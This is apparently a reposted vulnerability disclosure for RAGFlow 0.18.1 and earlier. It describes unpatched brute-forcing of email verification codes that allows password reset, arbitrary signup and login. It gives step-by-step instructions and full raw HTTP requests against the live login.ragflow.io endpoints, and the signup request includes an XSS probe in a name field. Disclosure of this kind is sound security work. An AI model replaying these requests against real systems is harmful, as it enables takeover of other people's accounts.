文章目录
RAGFlow
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine developed by Infiniflow, focused on deep document understanding and designed to provide efficient and scalable question-answering system solutions for various enterprises.
Community activity: over 50,000 stars, 5,000 forks, and more than 250 contributors.
Project Homepage: https://github.com/infiniflow/ragflow
Demo URL: https://demo.ragflow.io
Vulnerability Description
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. Versions 0.18.1 and earlier are vulnerable to an account takeover flaw that allows attackers to brute-force email verification codes to perform arbitrary account registration, login, and password reset. As of the time of publication, no patched version is available.
[1]Vulnerability Steps
1.Navigate to the password reset page.
2.Enter the victim’s username.
3.The system will send a verification code to the victim’s email.
4.Enter any verification code and click “Next.” At this point, intercept the request, which corresponds to the /api/verify-code endpoint.
The specific request packet is as follows:
POST /api/verify-code HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 136
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close
{"application":"RAGFlow","organization":"infiniflow","username":"victim email","name":"aaas2","code":"501777","type":"login"}
5.The response packet is as follows:
6.After replacing the intercepted response packet, the following password reset page is displayed:
7.Clicking “Change Password” triggers the password reset request packet:
POST /api/set-password HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 557
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6zphfvJ3DZ0xdxzB
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userOwner"
infiniflow
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userName"
aaas2
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="oldPassword"
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="newPassword"
aaassssD21
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="code"
501777
------WebKitFormBoundary6zphfvJ3DZ0xdxzB--
Ultimately, the account takeover is successfully achieved.
[2]Vulnerability Steps
1.Navigate to the registration page
2.Enter the victim’s email address for registration.
3.The system then sends a verification code to the victim’s email.
4.Enter any verification code and click “Sign Up”, then intercept the request. The corresponding endpoint is /api/signup. Perform a brute-force attack on the verification code. As shown below, there is no rate limiting in place:
5.The specific request packet is as follows:
POST /api/signup HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 251
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/signup/oauth/authorize?client_id=87fe30c13277b95d37b5&response_type=code&redirect_uri=https://demo.ragflow.io/v1/user/oauth_callback&scope=read
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close
{"application":"RAGFlow","organization":"infiniflow","username":"aaassssD2","name":"<script>alert(1)</script>","password":"12#Password","confirm":"aaassssD2","email":"Victim EMAIL","emailCode":"698623","agreement":true,"plan":null,"pricing":null}
6.The response packet is as follows:
This indicates that we have successfully achieved arbitrary user registration.
[3]Vulnerability Steps
On the login page, users can log in using an email verification code. Since this also relies on the /api/verify-code endpoint, it introduces a vulnerability that allows arbitrary user login, leading to full account takeover.
扫一扫
1785
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
